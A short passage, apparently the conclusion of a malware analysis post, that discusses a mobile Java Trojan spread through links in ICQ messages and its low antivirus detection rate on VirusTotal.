As the Trojan was distributed as a link through ICQ messages, it's clear that another malware was used for this, since the Trojan analyzed here has no spreading capabilities. Does this imply that a lot of ICQ users use their mobile phones? Or the attackers are just blindly shooting.

Finally, AV detection was less than good with only 14 AV (out of 41) products detecting the JAR file successfully (VirusTotal). That being said, it's clear that the time when we will have to run AV programs on our phones is quickly coming.